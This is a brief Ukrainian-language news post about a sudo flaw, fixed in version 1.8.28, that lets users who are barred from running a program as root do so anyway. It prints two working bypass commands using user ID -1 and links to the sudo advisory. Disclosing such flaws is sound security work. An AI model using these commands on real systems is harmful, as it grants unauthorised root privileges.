Помилка sudo дозволяє виконати від користувача root будь-який виконуваний файл, якщо /etc/sudoers дозволено його виконання від інших користувачів і заборонено для root.
Експлуатація помилки дуже проста:
sudo -u#-1 id -u
або:
sudo -u #4294967295 id -u
Помилка присутня у всіх версіях sudo до 1.8.28
подробиці:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
Джерело: linux.org.ru